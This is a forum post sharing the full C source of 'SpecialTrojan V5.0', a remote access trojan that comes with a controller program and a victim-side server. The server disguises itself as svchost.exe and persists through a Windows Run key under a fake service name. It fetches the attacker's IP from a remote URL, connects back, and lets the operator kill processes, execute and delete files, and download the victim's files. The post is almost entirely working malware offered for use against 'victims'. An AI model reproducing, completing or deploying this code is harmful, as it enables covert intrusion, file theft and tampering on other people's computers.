Info od autora
KlientAuthor: crAcker
Here is it my Version 5.0 of SpecialTrojan.
That will be my last version of SpecialTrojan i posted here.
It's using a reverse connection.
Credits to: %ebx
I hope it will be useful for some of you.
The code is a bit ugly , but you know already about my desktop.. so you dont need to wait more from me. The FileTransfer function is from %ebx, thanks alot to him, its working really perfect.., i added a search function too, so u can search file's then download any file you want.
P.S: just download function is inserted not upload, so you just can get file's from ur victim.. not send.
Kod: Zaznacz cały
#include <windows.h>
#include <stdio.h>
#define File 100
#define About 101
#define GetProcesses 1
#define GetFiles 2
#define Refrsh 3
#define ProcS 4
#define Kill 5
#define Download 6
#define FPath 7
#define FileBox 8
#define GetWindow 9
#define Close 10
#define Exec 11
#define Remv 12
#define ExecP 13
#define RemvP 14
#define OpenCD 15
#define CloseCD 16
#define RemoveS 17
#define SPserver 21
HWND WindowProcs;
HWND WindowFiles;
HWND Refresh;
HWND ProcessesBox;
HWND Terminate;
HWND DownLoad;
HWND FilePath;
HWND FilesBox;
HWND GetWindowTitle;
HWND CloseW;
HWND Execute;
HWND Remove;
HWND ExecPath;
HWND RemovePath;
HWND CDopen;
HWND CDclose;
HWND RemoveServer;
HWND WindowTitle;
HWND StopServer;
HANDLE SOCK;
HANDLE Procs;
HANDLE FileS;
HANDLE RecvProc;
HANDLE RecvFiles;
WSADATA wsadata;
SOCKET client, server;
char szClassName[ ] = "SpecialTrojan";
char Text[16] = "Copyright: Onur";
char Command[200];
char Data[260];
char Ready[10];
char Buff[2000000];
int Cursel;
char DFile[50];
char* header[4096];
char recvBUFF[4096];
char* filename, * filesize;
FILE * recvFILE;
int received = 0;
char tempstr[4096];
int count1=1, count2=1, percent;
char LocalFP[MAX_PATH];
char RemoteFP[MAX_PATH];
char check[50];
HANDLE Recv;
int parseARGS(char **args, char *line)
{
int tmp=0;args[tmp] = strtok( line, ":" );
while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
return tmp - 1;
}
DWORD WINAPI RecvFile(LPVOID)
{
if(recv(server, recvBUFF, sizeof(recvBUFF), 0) )
{
if(!strncmp(recvBUFF,"FBEGIN",6))
{
recvBUFF[strlen(recvBUFF) - 2] = 0;
parseARGS(header, recvBUFF);
filename = header[1];
filesize = header[2];
}
recvBUFF[0] = 0;
recvFILE = fopen (filename,"wb");
percent = atoi( filesize ) / 100;
while(!feof(recvFILE))
{
if(recv(server, recvBUFF, 1, 0) != 0 )
{
if(fwrite(recvBUFF , sizeof(recvBUFF[0]) , 1 , recvFILE) == ERROR)
{
MessageBox(NULL, "Error writing file !", "Error", MB_OK | MB_ICONERROR);
TerminateThread(Recv, 0);
}
if(count1 == count2)
{
printf("33[0;0H"); //move cursor to 0, 0
printf( "\33[2J"); //clear line
printf("Filename: %s\n", filename);
printf("Filesize: %d Kb\n", atoi(filesize) / 1024);
printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);
count1+=percent;
}
count2++;
received++;
recvBUFF[0] = 0;
}
}
}
}
BOOL EDbleWindow(BOOL b)
{
EnableWindow(WindowProcs, b);
EnableWindow(WindowFiles, b);
EnableWindow(GetWindowTitle, b);
EnableWindow(CloseW, b);
EnableWindow(Execute, b);
EnableWindow(Remove, b);
EnableWindow(ExecPath, b);
EnableWindow(RemovePath, b);
EnableWindow(CDopen, b);
EnableWindow(CDclose, b);
EnableWindow(RemoveServer, b);
EnableWindow(StopServer, b);
}
DWORD WINAPI WinSock(LPVOID)
{
if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
{
MessageBox(NULL, "Error by initialization !", "Initialization Failed", MB_OK | MB_ICONERROR);
WSACleanup();
exit(0);
}
client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(client == INVALID_SOCKET)
{
MessageBox(NULL, "Error by creating socket !", "Socket Error", MB_OK | MB_ICONERROR);
WSACleanup();
closesocket(client), (server);
exit(0);
}
struct sockaddr_in cln;
cln.sin_port=htons(80);
cln.sin_addr.s_addr=INADDR_ANY;
cln.sin_family=AF_INET;
if(bind(client, (sockaddr*)&cln, sizeof(cln)) != 0)
{
MessageBox(NULL, "Error by bind socket !", "Bind Error", MB_OK | MB_ICONERROR);
}
int clnt = sizeof(cln);
listen(client, 0);
server = accept(client, (sockaddr*)&client, &clnt);
EDbleWindow(true);
MessageBox(NULL, "Connected !", "Connected", MB_OK | MB_ICONINFORMATION);
TerminateThread(SOCK, 0);
}
DWORD WINAPI RecvProcesses(LPVOID)
{
SendMessage(ProcessesBox, LB_RESETCONTENT, 0, 0);
send(server, Ready, sizeof(Ready), 0);
while(recv(server, Data, 200, 0))
{
if(!strcmp(Data, "finished"))
{
TerminateThread(RecvProc, 0);
}
else if(!strcmp(Data, "Successfully"))
{
}
else if(!strcmp(Data, "Error"))
{
}
else if(!strcmp(Data, ""))
{
}
else
SendMessage(ProcessesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
send(server, Ready, sizeof(Ready), 0);
}
}
DWORD WINAPI RecvFileS(LPVOID)
{
SendMessage(FilesBox, LB_RESETCONTENT, 0, 0);
while(recv(server, Data, sizeof(Data), 0))
{
if(!strcmp(Data, ""))
{}
if(!strcmp(Data, "Error"))
{
MessageBox(NULL, "Error getting file's !", "Error", MB_OK | MB_ICONERROR);
strcpy(Data, "");
TerminateThread(RecvFiles, 0);
}
if(!strcmp(Data, "finished"))
{
strcpy(Data, "");
TerminateThread(RecvFiles, 0);
}
else
{
SendMessage(FilesBox, LB_INSERTSTRING, (WPARAM)-1, (LPARAM)Data);
send(server, Ready, sizeof(Ready), 0);
}
}
}
LRESULT CALLBACK Processes (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
TerminateThread(RecvProc, 0);
strcpy(Data, "");
PostQuitMessage (0);
break;
case WM_CREATE:
CreateWindowEx(0, "Button", "Refresh", WS_VISIBLE | WS_CHILD | WS_BORDER, 23, 10, 70, 20, hwnd, (HMENU)Refrsh, 0, NULL);
CreateWindowEx(0, "Button", "Kill", WS_VISIBLE | WS_CHILD | WS_BORDER, 120, 10, 70, 20, hwnd, (HMENU)Kill, 0, NULL);
ProcessesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 15, 35, 183, 235, hwnd, (HMENU)ProcS, 0, NULL);
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case Refrsh:
strcpy(Command, "GetProcesses");
send(server, Command, 20, 0);
TerminateThread(RecvProc, 0);
RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
break;
case Kill:
if(MessageBox(NULL, "Are you sure, you want to terminate the process ?", "Terminate Process", MB_YESNO | MB_ICONQUESTION) == IDYES)
{
strcpy(Command, "Kill");
send(server, Command, sizeof(Command), 0);
Cursel = SendMessage(ProcessesBox, LB_GETCURSEL, 0, 0);
SendMessage(ProcessesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)Data);
send(server, Data, sizeof(Data), 0);
recv(server, Data, sizeof(Data), 0);
if(!strcmp(Data, "Error"))
{
MessageBox(NULL, "Error by killig process !", "Error", MB_OK | MB_ICONERROR);
}
else
{
SendMessage(ProcessesBox, LB_DELETESTRING, (WPARAM)Cursel, 0);
MessageBox(NULL, "Process killed succesfully !", "Process Killed", MB_OK | MB_ICONINFORMATION);
}
}
break;
}
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}
}
DWORD WINAPI PWindow(LPVOID)
{
HWND hwnd;
MSG messages;
WNDCLASSEX wincl;
wincl.hInstance = 0;
wincl.lpszClassName = "Processes";
wincl.lpfnWndProc = Processes;
wincl.style = CS_DBLCLKS;
wincl.cbSize = sizeof (WNDCLASSEX);
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;
RegisterClassEx(&wincl);
hwnd = CreateWindowEx (
0,
"Processes",
"Processes",
WS_SYSMENU | WS_VISIBLE,
CW_USEDEFAULT,
CW_USEDEFAULT,
220,
300,
HWND_DESKTOP,
NULL,
0,
NULL
);
while (GetMessage (&messages, NULL, 0, 0))
{
TranslateMessage(&messages);
DispatchMessage(&messages);
}
}
LRESULT CALLBACK Files (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
TerminateThread(Recv, 0), TerminateThread(RecvFiles, 0);
if(!strcmp(check, "DownloadAktiv"))
{
fclose(recvFILE);
strcpy(check, "");
}
PostQuitMessage (0);
break;
case WM_CREATE:
CreateWindowEx(0, "Button", "Get Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 8, 10, 80, 20, hwnd, (HMENU)GetFiles, 0, NULL);
CreateWindowEx(0, "Button", "Download", WS_VISIBLE | WS_CHILD | WS_BORDER, 125, 10, 80, 20, hwnd, (HMENU)Download, 0, NULL);
CreateWindowEx(0, "Edit", "C:\\WINDOWS\\*.txt", WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 8, 35, 197, 18, hwnd, (HMENU)FPath, 0, NULL);
FilesBox = CreateWindowEx(0, "ListBox", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | WS_VSCROLL | LBS_DISABLENOSCROLL, 8, 57, 198, 209, hwnd, (HMENU)FileBox, 0, NULL);
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
case GetFiles:
strcpy(Command, "GetFiles");
send(server, Command, 20, 0);
GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
send(server, Data, sizeof(Data), 0);
TerminateThread(RecvFiles, 0);
RecvFiles = CreateThread(NULL, 0, RecvFileS, 0, 0, NULL);
break;
case Download:
strcpy(Command, "Download");
send(server, Command, 20, 0);
strcpy(check, "DownloadAktiv");
Cursel = SendMessage(FilesBox, LB_GETCURSEL, 0, 0);
SendMessage(FilesBox, LB_GETTEXT, (WPARAM)Cursel, (LPARAM)DFile);
GetDlgItemText(hwnd, FPath, Data, sizeof(Data));
if(!strcmp(Data, ""))
{
strcpy(Data, "Error");
send(server, Data, 8, 0);
MessageBox(NULL, "You doesn't typed the path of the file to download !", "Donwload", MB_OK | MB_ICONWARNING);
TerminateThread(FileS, 0);
}
if(!strcmp(DFile, ""))
{
strcpy(Data, "Error");
send(server, Data, 8, 0);
MessageBox(NULL, "You doesn't selected a file to download !", "Download", MB_OK | MB_ICONWARNING);
TerminateThread(FileS, 0);
}
send(server, Data, sizeof(Data), 0);
Sleep(10);
send(server, DFile, sizeof(DFile), 0);
Recv = CreateThread(NULL, 0, RecvFile, 0, 0, NULL);
break;
}
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}
}
DWORD WINAPI FWindow(LPVOID)
{
HWND hwnd;
MSG messages;
WNDCLASSEX wincl;
wincl.hInstance = 0;
wincl.lpszClassName = "Files";
wincl.lpfnWndProc = Files;
wincl.style = CS_DBLCLKS;
wincl.cbSize = sizeof (WNDCLASSEX);
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;
RegisterClassEx(&wincl);
hwnd = CreateWindowEx (
0,
"Files",
"Files",
WS_SYSMENU | WS_VISIBLE,
CW_USEDEFAULT,
CW_USEDEFAULT,
220,
292,
HWND_DESKTOP,
NULL,
0,
NULL
);
while (GetMessage (&messages, NULL, 0, 0))
{
TranslateMessage(&messages);
DispatchMessage(&messages);
}
}
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
int WINAPI WinMain (HINSTANCE hThisInstance,
HINSTANCE hPrevInstance,
LPSTR lpszArgument,
int nFunsterStil)
{
SOCK = CreateThread(NULL, 0, WinSock, 0, 0, NULL);
HWND hwnd;
MSG messages;
WNDCLASSEX wincl;
wincl.hInstance = hThisInstance;
wincl.lpszClassName = szClassName;
wincl.lpfnWndProc = WindowProcedure;
wincl.style = CS_DBLCLKS;
wincl.cbSize = sizeof (WNDCLASSEX);
wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);
wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
wincl.lpszMenuName = NULL;
wincl.cbClsExtra = 0;
wincl.cbWndExtra = 0;
wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND+4;
if (!RegisterClassEx (&wincl))
return 0;
hwnd = CreateWindowEx (
0,
szClassName,
"SpecialTrojan V 5.0",
WS_SYSMENU | WS_MINIMIZEBOX,
CW_USEDEFAULT,
CW_USEDEFAULT,
250,
300,
HWND_DESKTOP,
NULL,
hThisInstance,
NULL
);
ShowWindow (hwnd, nFunsterStil);
while (GetMessage (&messages, NULL, 0, 0))
{
TranslateMessage(&messages);
DispatchMessage(&messages);
}
return messages.wParam;
}
LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
HMENU hMenu;
HMENU hMenuInfo1;
HMENU hMenuInfo2;
PAINTSTRUCT ps;
HDC hdc;
switch (message)
{
case WM_DESTROY:
strcpy(Command, "bye");
send(server, Command, 8, 0);
PostQuitMessage (0);
break;
case WM_PAINT:
hdc = BeginPaint(hwnd, &ps);
TextOut(hdc, 133, 223, Text, sizeof(Text) - 1);
EndPaint(hwnd, &ps) ;
break;
case WM_CREATE:
hMenu = CreateMenu();
hMenuInfo1 = CreateMenu();
hMenuInfo2 = CreateMenu();
AppendMenu(hMenuInfo1, MF_STRING, File, "Exit");
AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo1, "File");
AppendMenu(hMenuInfo2, MF_STRING, About, "About");
AppendMenu(hMenu, MF_POPUP, (UINT) hMenuInfo2, "Info");
SetMenu(hwnd, hMenu);
WindowProcs = CreateWindowEx(0, "Button", "Processes", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 5, 80, 22, hwnd, (HMENU)GetProcesses, 0, NULL);
WindowFiles = CreateWindowEx(0, "Button", "Files", WS_VISIBLE | WS_CHILD | WS_BORDER, 153, 5, 80, 22, hwnd, (HMENU)GetFiles, 0, NULL);
GetWindowTitle = CreateWindowEx(0, "Button", "Get Window", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 35, 95, 22, hwnd, (HMENU)GetWindow, 0, NULL);
WindowTitle = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_READONLY, 7, 58, 230, 18, hwnd, 0, 0, NULL);
CloseW = CreateWindowEx(0, "Button", "Close", WS_VISIBLE | WS_CHILD | WS_BORDER, 73, 78, 95, 22, hwnd, (HMENU)Close, 0, NULL);
Execute = CreateWindowEx(0, "Button", "Execute", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 105, 65, 22, hwnd, (HMENU)Exec, 0, NULL);
Remove = CreateWindowEx(0, "Button", "Remove", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 155, 65, 22, hwnd, (HMENU)Remv, 0, NULL);
ExecPath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 130, 150, 18, hwnd, (HMENU)ExecP, 0, NULL);
RemovePath = CreateWindowEx(0, "Edit", 0, WS_VISIBLE | WS_CHILD | WS_BORDER | ES_AUTOHSCROLL, 10, 180, 150, 18, hwnd, (HMENU)RemvP, 0, NULL);
CDopen = CreateWindowEx(0, "Button", "Open CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 118, 72, 22, hwnd, (HMENU)OpenCD, 0, NULL);
CDclose = CreateWindowEx(0, "Button", "Close CD", WS_VISIBLE | WS_CHILD | WS_BORDER, 167, 155, 72, 22, hwnd, (HMENU)CloseCD, 0, NULL);
StopServer = CreateWindowEx(0, "Button", "Stop Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 200, 100, 22, hwnd, (HMENU)SPserver, 0, NULL);
RemoveServer = CreateWindowEx(0, "Button", "Remove Server", WS_VISIBLE | WS_CHILD | WS_BORDER, 10, 220, 115, 25, hwnd, (HMENU)RemoveS, 0, NULL);
EDbleWindow(false);
break;
case WM_COMMAND:
switch(LOWORD(wParam))
{
if(HIWORD(wParam) == 0)
{
case File:
strcpy(Command, "bye");
send(server, Command, 5, 0);
PostQuitMessage(0);
break;
case About:
MessageBox(NULL, "SpecialTrojan Version 5.0\nRemote Access Trojan® -2007\n\nCopyright© : Onur\n\ncontact: mafiaonur@yahoo.de", "About", MB_OK | MB_ICONINFORMATION);
break;
}
case GetProcesses:
TerminateThread(Procs, 0);
Procs = CreateThread(NULL, 0, PWindow, 0, 0, NULL);
TerminateThread(RecvProc, 0);
RecvProc = CreateThread(NULL, 0, RecvProcesses, 0, 0, NULL);
strcpy(Command, "GetProcesses");
send(server, Command, 20, 0);
break;
case GetFiles:
TerminateThread(FileS, 0);
FileS = CreateThread(NULL, 0, FWindow, 0, 0, NULL);
break;
case GetWindow:
strcpy(Command, "GetWindow");
send(server, Command, 15, 0);
recv(server, Data, sizeof(Data), 0);
SetWindowText(WindowTitle, Data);
break;
case Close:
strcpy(Command, "CloseWindow");
send(server, Command, 20, 0);
MessageBox(NULL, "Current window closed !", "Close Window", MB_OK | MB_ICONINFORMATION);
break;
case Exec:
strcpy(Command, "Execute");
send(server, Command, 15, 0);
GetDlgItemText(hwnd, ExecP, Data, sizeof(Data));
if(!strcmp(Data, ""))
{
MessageBox(NULL, "Execute path is empty !", "Execute", MB_OK | MB_ICONWARNING);
send(server, Data, 10, 0);
}
else
{
send(server, Data, sizeof(Data), 0);
MessageBox(NULL, "File executed !", "Execute", MB_OK | MB_ICONINFORMATION);
}
break;
case Remv:
strcpy(Command, "Remove");
send(server, Command, 15, 0);
GetDlgItemText(hwnd, RemvP, Data, sizeof(Data));
if(!strcmp(Data, ""))
{
MessageBox(NULL, "Remove path is empty !", "Remove", MB_OK | MB_ICONINFORMATION);
send(server, Data, sizeof(Data), 0);
}
else
{
send(server, Data, sizeof(Data), 0);
recv(server, Data, 20, 0);
if(!strcmp(Data, "Error"))
{
MessageBox(NULL, "Error by removing file !", "Remove", MB_OK | MB_ICONWARNING);
}
else
{
MessageBox(NULL, "File removed successfully !", "Remove", MB_OK | MB_ICONINFORMATION);
}
}
break;
case OpenCD:
strcpy(Command, "OpenCD");
send(server, Command, 10, 0);
MessageBox(NULL, "CD-ROM opened !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
break;
case CloseCD:
strcpy(Command, "CloseCD");
send(server, Command, 10, 0);
MessageBox(NULL, "CD-ROM closed !", "CD-ROM", MB_OK | MB_ICONINFORMATION);
break;
case SPserver:
strcpy(Command, "stop");
send(server, Command, 10, 0);
EDbleWindow(false);
MessageBox(NULL, "Server stopped !", "Stop Server", MB_OK | MB_ICONINFORMATION);
break;
case RemoveS:
strcpy(Command, "Uninstall");
send(server, Command, 20, 0);
recv(server, Data, 20, 0);
if(!strcmp(Data, "Error"))
{
MessageBox(NULL, "Failed to remove the server !", "Remove Server", MB_OK | MB_ICONWARNING);
}
else
{
EDbleWindow(false);
TerminateThread(SOCK, 0);
TerminateThread(Procs, 0);
TerminateThread(FileS, 0);
TerminateThread(RecvProc, 0);
TerminateThread(RecvFiles, 0);
TerminateThread(Recv, 0);
MessageBox(NULL, "Server removed successfully !", "Remove Server", MB_OK | MB_ICONINFORMATION);
}
break;
}
default:
return DefWindowProc (hwnd, message, wParam, lParam);
}
return 0;
}
Kod: Zaznacz cały
#include <windows.h>
#include <wininet.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <vector>
#include <string>
#define backlog 1
using namespace std;
BOOL KillProcessByName(char *szProcessToKill);
typedef BOOL (WINAPI *TH32_PROCESS)
(HANDLE hSnapShot, LPPROCESSENTRY32 lppe);
static TH32_PROCESS pProcess32First = NULL;
static TH32_PROCESS pProcess32Next = NULL;
HINTERNET hInet2, hFtp2;
char Server[MAX_PATH];
char ServerDir[MAX_PATH];
char Command[200];
char Data[260];
char IP[20];
DWORD size;
char Ready[20];
char DFile[50];
char* header[4096];
char recvBUFF[4096];
char* filename, * filesize;
FILE * recvFILE;
int received = 0;
char tempstr[4096];
int count1=1, count2=1, percent;
WSADATA wsadata;
SOCKET client, server;
int fileSEND(char *lfile, char *rfile)
{
FILE * file_to_send;
int ch;
char toSEND[1];
char remoteFILE[4096];
int count1=1,count2=1, percent;
file_to_send = fopen(lfile,"rb");
long fileSIZE;
fseek(file_to_send, 0, SEEK_END);
fileSIZE =ftell (file_to_send);
rewind(file_to_send);
sprintf(remoteFILE, "FBEGIN:%s:%d\r\n", rfile, fileSIZE);
send(client, remoteFILE, sizeof(remoteFILE), 0);
percent = fileSIZE / 100;
while((ch=getc(file_to_send))!=EOF)
{
toSEND[0] = ch;
send(client, toSEND, 1, 0);
if( count1 == count2)
{
printf("33[0;0H");
printf( "\33[2J");
printf("Filename: %s\n", lfile);
printf("Filesize: %d Kb\n", fileSIZE / 1024);
printf("Percent : %d%% ( %d Kb)\n",count1 / percent ,count1 / 1024);
count1+=percent;
}
count2++;
}
fclose(file_to_send);
return 0;
}
int parseARGS(char **args, char *line)
{
int tmp=0;args[tmp] = strtok( line, ":" );
while((args[++tmp] = strtok(NULL, ":" ) ) != NULL );
return tmp - 1;
}
void StartUp()
{
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH, Server, sizeof(Server));
GetSystemDirectory(ServerDir, sizeof(ServerDir));
strcat(ServerDir, "\\win32");
CreateDirectory(ServerDir, 0);
strcat(ServerDir, "\\svchost.exe");
if(!strcmp(Server, ServerDir))
{
goto key;
}
else
{
CopyFile(Server, ServerDir, 0);
}
key:
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
RegSetValueEx(hKey, "Generic Host Process for Win32 Services", 0, REG_SZ,(const unsigned char*)ServerDir, sizeof(ServerDir));
RegCloseKey(hKey);
}
void RecvCommands()
{
while(1)
{
recv(client, Command, sizeof(Command), 0);
if(!strcmp(Command, "bye"))
{
WSACleanup();
closesocket(client);
Sleep(200);
TryAgain:
closesocket(client), (server);
Sleep(5000);
HINTERNET hInet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if(hInet == NULL)
{
InternetCloseHandle(hInet);
goto TryAgain;
}
/* Edit the url, u need to give the url of ur ip !!! */
HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
InternetReadFile(hFile, IP, 20, &size);
InternetCloseHandle(hInet), (hFile);
if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
{
WSACleanup();
goto TryAgain;
}
client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(client == INVALID_SOCKET)
{
WSACleanup();
closesocket(client);
goto TryAgain;
}
sockaddr_in clnt;
clnt.sin_port=htons(80);
clnt.sin_addr.s_addr=inet_addr(IP);
clnt.sin_family=AF_INET;
if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
{
WSACleanup();
closesocket(client), (server);
goto TryAgain;
}
}
if(!strcmp(Command, "GetProcesses"))
{
recv(client, Ready, sizeof(Ready), 0);
PROCESSENTRY32 pe32 = {0};
HANDLE hSnapshot = NULL;
HINSTANCE hDll = LoadLibrary("kernel32.dll");
pProcess32First=(TH32_PROCESS)GetProcAddress(hDll, "Process32First");
pProcess32Next=(TH32_PROCESS)GetProcAddress(hDll, "Process32Next");
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnapshot != (HANDLE) -1)
{
pe32.dwSize = sizeof(PROCESSENTRY32);
int proc_cnt = 0, thrd_cnt = 0;
if(pProcess32First(hSnapshot, &pe32))
{
do
{
strcpy(Data, pe32.szExeFile);
send(client, Data, 200, 0);
recv(client, Ready, sizeof(Ready), 0);
}
while(pProcess32Next(hSnapshot, &pe32));
CloseHandle(hSnapshot);
}
}
strcpy(Data, "finished");
send(client, Data, 200, 0);
}
if(!strcmp(Command, "Kill"))
{
recv(client, Data, sizeof(Data), 0);
KillProcessByName(Data);
}
if(!strcmp(Command, "Execute"))
{
recv(client, Data, sizeof(Data), 0);
ShellExecute(NULL, NULL, Data, NULL, NULL, SW_SHOW);
}
if(!strcmp(Command, "Remove"))
{
recv(client, Data, sizeof(Data), 0);
if(DeleteFile(Data) == ERROR)
{
strcpy(Data, "Error");
send(client, Data, 10, 0);
}
else
{
strcpy(Data, "Succesfully");
send(client, Data, 20, 0);
}
}
if(!strcmp(Command, "OpenCD"))
{
mciSendString("set CDAudio door open", NULL, 0, NULL);
}
if(!strcmp(Command, "CloseCD"))
{
mciSendString("set CDAudio door closed", NULL, 0, NULL);
}
if(!strcmp(Command, "CloseWindow"))
{
HWND Window = GetForegroundWindow();
SendMessage(Window, WM_CLOSE, 0, 0);
}
if(!strcmp(Command, "GetWindow"))
{
HWND Window = GetForegroundWindow();
GetWindowText(Window, Data, MAX_PATH);
send(client, Data, sizeof(Data), 0);
}
if(!strcmp(Command, "Uninstall"))
{
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
if(RegDeleteValue(hKey, "Generic Host Process for Win32 Services") != ERROR)
{
strcpy(Data, "Error");
send(client, Data, 10, 0);
}
else
{
strcpy(Data, "Succesfully");
send(client, Data, 20, 0);
WSACleanup();
closesocket(server), (client);
exit(0);
}
}
if(!strcmp(Command, "GetFiles"))
{
recv(client, Data, sizeof(Data), 0);
std::vector<std::string> dir;
WIN32_FIND_DATA data;
HANDLE hFile = FindFirstFileA(Data, &data);
if(hFile == INVALID_HANDLE_VALUE)
{
strcpy(Data, "Error");
send(client, Data, sizeof(Data), 0);
}
do{
if(data.dwFileAttributes)
{
strcpy(Data, data.cFileName);
send(client, Data, sizeof(Data), 0);
recv(client, Ready, sizeof(Ready), 0);
dir.push_back(std::string(data.cFileName));
}
}
while(FindNextFile(hFile, &data));
strcpy(Data, "finished");
send(client, Data, sizeof(Data), 0);
}
if(!strcmp(Command, "Download"))
{
recv(client, Data, sizeof(Data), 0);
recv(client, DFile, sizeof(DFile), 0);
if(!strcmp(Data, "Error"))
{
}
else
{
fileSEND(Data, DFile);
}
}
if(!strcmp(Command, "stop"))
{
WSACleanup();
closesocket(server), (client);
exit(0);
}
}
}
void ConnectToClient()
{
TryAgain:
closesocket(client), (server);
Sleep(5000);
HINTERNET hInet = InternetOpen("GetIp", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
if(hInet == NULL)
{
InternetCloseHandle(hInet);
goto TryAgain;
}
/* Edit the url, u need to give the url of ur ip !!! */
HINTERNET hFile = InternetOpenUrl(hInet, "http://hackerswelcome.ha.funpic.de/ip.txt", NULL, 0, 0, 0);
InternetReadFile(hFile, IP, 20, &size);
InternetCloseHandle(hInet), (hFile);
if(WSAStartup(MAKEWORD(2, 2), &wsadata) != 0)
{
WSACleanup();
goto TryAgain;
}
client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(client == INVALID_SOCKET)
{
WSACleanup();
closesocket(client);
goto TryAgain;
}
sockaddr_in clnt;
clnt.sin_port=htons(80);
clnt.sin_addr.s_addr=inet_addr(IP);
clnt.sin_family=AF_INET;
if(connect(client,(sockaddr*)&clnt, sizeof(clnt)) == SOCKET_ERROR)
{
WSACleanup();
closesocket(client), (server);
goto TryAgain;
}
else
{
RecvCommands();
}
}
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)
{
StartUp();
ConnectToClient();
}
BOOL KillProcessByName(char *szProcessToKill)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
DWORD dwPriorityClass;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hProcessSnap == INVALID_HANDLE_VALUE)
{
return(FALSE);
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if(!Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap);
return(FALSE);
}
do{
if(!strcmp(pe32.szExeFile, szProcessToKill))
{
hProcess = OpenProcess(PROCESS_TERMINATE,0, pe32.th32ProcessID);
if(TerminateProcess(hProcess,0) == ERROR)
{
strcpy(Data, "Error");
send(client, Data, sizeof(Data), 0);
}
else
{
strcpy(Data, "Succesfully");
send(client, Data, sizeof(Data), 0);
}
}
}
while(Process32Next(hProcessSnap, &pe32));
CloseHandle(hProcessSnap), (hProcess);
}